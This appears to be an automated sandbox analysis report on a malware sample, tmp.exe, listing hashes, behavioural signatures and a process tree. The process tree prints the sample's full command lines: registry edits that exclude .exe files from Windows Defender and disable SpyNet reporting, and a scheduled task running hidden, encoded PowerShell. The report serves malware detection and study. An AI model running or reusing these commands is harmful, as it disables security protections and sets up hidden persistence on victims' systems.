Analysis
-
max time kernel
400s -
max time network
426s -
platform
windows10-2004_x64 -
resource
win10v2004-20221111-en -
resource tags
arch:x64arch:x86image:win10v2004-20221111-enlocale:en-usos:windows10-2004-x64system -
submitted
27/11/2022, 20:12
Static task
static1
Behavioral task
behavioral1
Sample
tmp.exe
Resource
win7-20220901-en
Behavioral task
behavioral2
Sample
tmp.exe
Resource
win10v2004-20221111-en
General
-
Target
tmp.exe
-
Size
7.3MB
-
MD5
96c8cf366a208bb8c718c8adb8fe8f09
-
SHA1
523c74fd08b2b48f7d9e2f1ded880b3395b7fd09
-
SHA256
d099ddbc7cff4f0df2958dbdb0566010bbf399a2f66688fe676d7996e327a97c
-
SHA512
a2bb85b49fd64e3b5d372f1f23c1826233e6ceddf66ec1ea6eae959888e9471de4e602638df1936e7bf69687bf0ee164fb7b94e40c15edce2b31dd47c0d3d5b1
-
SSDEEP
196608:91O7zHr+QgWi5Hv2fnrwPoi3mzXM0GWZ61mLPwR:3O7/+fWQP2TwPoGGZY1DR
Malware Config
Signatures
-
Executes dropped EXE 2 IoCs
pid Process 4384 Install.exe 2912 Install.exe -
Checks BIOS information in registry 2 TTPs 1 IoCs
BIOS information is often read in order to detect sandboxing environments.
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion Install.exe -
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-2971393436-602173351-1645505021-1000\Control Panel\International\Geo\Nation Install.exe -
Drops file in System32 directory 1 IoCs
description ioc Process File created C:\Windows\system32\GroupPolicy\gpt.ini Install.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Creates scheduled task(s) 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 4872 schtasks.exe -
Enumerates system info in registry 2 TTPs 2 IoCs
description ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS Install.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName Install.exe -
Suspicious use of WriteProcessMemory 36 IoCs
description pid Process procid_target PID 2412 wrote to memory of 4384 2412 tmp.exe 80 PID 2412 wrote to memory of 4384 2412 tmp.exe 80 PID 2412 wrote to memory of 4384 2412 tmp.exe 80 PID 4384 wrote to memory of 2912 4384 Install.exe 81 PID 4384 wrote to memory of 2912 4384 Install.exe 81 PID 4384 wrote to memory of 2912 4384 Install.exe 81 PID 2912 wrote to memory of 2628 2912 Install.exe 84 PID 2912 wrote to memory of 2628 2912 Install.exe 84 PID 2912 wrote to memory of 2628 2912 Install.exe 84 PID 2912 wrote to memory of 5020 2912 Install.exe 87 PID 2912 wrote to memory of 5020 2912 Install.exe 87 PID 2912 wrote to memory of 5020 2912 Install.exe 87 PID 2912 wrote to memory of 4872 2912 Install.exe 88 PID 2912 wrote to memory of 4872 2912 Install.exe 88 PID 2912 wrote to memory of 4872 2912 Install.exe 88 PID 2628 wrote to memory of 764 2628 forfiles.exe 91 PID 2628 wrote to memory of 764 2628 forfiles.exe 91 PID 2628 wrote to memory of 764 2628 forfiles.exe 91 PID 5020 wrote to memory of 3468 5020 forfiles.exe 90 PID 5020 wrote to memory of 3468 5020 forfiles.exe 90 PID 5020 wrote to memory of 3468 5020 forfiles.exe 90 PID 764 wrote to memory of 4744 764 cmd.exe 92 PID 764 wrote to memory of 4744 764 cmd.exe 92 PID 764 wrote to memory of 4744 764 cmd.exe 92 PID 3468 wrote to memory of 3700 3468 cmd.exe 93 PID 3468 wrote to memory of 3700 3468 cmd.exe 93 PID 3468 wrote to memory of 3700 3468 cmd.exe 93 PID 2912 wrote to memory of 3760 2912 Install.exe 94 PID 2912 wrote to memory of 3760 2912 Install.exe 94 PID 2912 wrote to memory of 3760 2912 Install.exe 94 PID 764 wrote to memory of 116 764 cmd.exe 96 PID 764 wrote to memory of 116 764 cmd.exe 96 PID 764 wrote to memory of 116 764 cmd.exe 96 PID 3468 wrote to memory of 348 3468 cmd.exe 97 PID 3468 wrote to memory of 348 3468 cmd.exe 97 PID 3468 wrote to memory of 348 3468 cmd.exe 97
Processes
-
C:\Users\Admin\AppData\Local\Temp\tmp.exe"C:\Users\Admin\AppData\Local\Temp\tmp.exe"1⤵
- Suspicious use of WriteProcessMemory
PID:2412 -
C:\Users\Admin\AppData\Local\Temp\7zSD0CE.tmp\Install.exe.\Install.exe2⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:4384 -
C:\Users\Admin\AppData\Local\Temp\7zSFAC.tmp\Install.exe.\Install.exe /S /site_id "757674"3⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks computer location settings
- Drops file in System32 directory
- Enumerates system info in registry
- Suspicious use of WriteProcessMemory
PID:2912 -
C:\Windows\SysWOW64\forfiles.exe"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:32® ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:64&"4⤵
- Suspicious use of WriteProcessMemory
PID:2628 -
C:\Windows\SysWOW64\cmd.exe/C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32® ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64&5⤵
- Suspicious use of WriteProcessMemory
PID:764 -
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:326⤵PID:4744
-
-
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:646⤵PID:116
-
-
-
-
C:\Windows\SysWOW64\forfiles.exe"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:32® ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:64&"4⤵
- Suspicious use of WriteProcessMemory
PID:5020 -
C:\Windows\SysWOW64\cmd.exe/C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32® ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64&5⤵
- Suspicious use of WriteProcessMemory
PID:3468 -
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:326⤵PID:3700
-
-
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:646⤵PID:348
-
-
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "gnWobqWGs" /SC once /ST 05:22:32 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="4⤵
- Creates scheduled task(s)
PID:4872
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "gnWobqWGs"4⤵PID:3760
-
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==1⤵PID:4248
Network
MITRE ATT&CK Enterprise v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
6.3MB
MD5b73a2867ddadf6e023cf92a8b935e60b
SHA1e4e68805fb8916034c6bb8413178e971c8254a15
SHA256c00e6919b64ebabbe4da38e2ea291699f3ed5dbe16f4c3935e3f3f688e75e959
SHA5125921491a5093943621a82114c38fe2eec3b7e03b473fbb355d28f32e7c710c5c02483ce1c7ea3991f40de262f02a652272cab565a1f1ce34afad047217080dec
-
Filesize
6.3MB
MD5b73a2867ddadf6e023cf92a8b935e60b
SHA1e4e68805fb8916034c6bb8413178e971c8254a15
SHA256c00e6919b64ebabbe4da38e2ea291699f3ed5dbe16f4c3935e3f3f688e75e959
SHA5125921491a5093943621a82114c38fe2eec3b7e03b473fbb355d28f32e7c710c5c02483ce1c7ea3991f40de262f02a652272cab565a1f1ce34afad047217080dec
-
Filesize
6.7MB
MD5ff49c9f567657433469094f1e033b55c
SHA12ab779a62dc28d54f479f516a6d566490821611b
SHA256a7ae7aa0d33ae421777c9bce6f76d1051eda7115d1d9ca8d4eed34be29b2033c
SHA51208c348e3922e774a4ed26f436e45b2331a25b1c9db72dad118ab463981cb83c122e830c17f059de5c9984e9c3b9e4ee545feb067783da73f80e00d81d508f64c
-
Filesize
6.7MB
MD5ff49c9f567657433469094f1e033b55c
SHA12ab779a62dc28d54f479f516a6d566490821611b
SHA256a7ae7aa0d33ae421777c9bce6f76d1051eda7115d1d9ca8d4eed34be29b2033c
SHA51208c348e3922e774a4ed26f436e45b2331a25b1c9db72dad118ab463981cb83c122e830c17f059de5c9984e9c3b9e4ee545feb067783da73f80e00d81d508f64c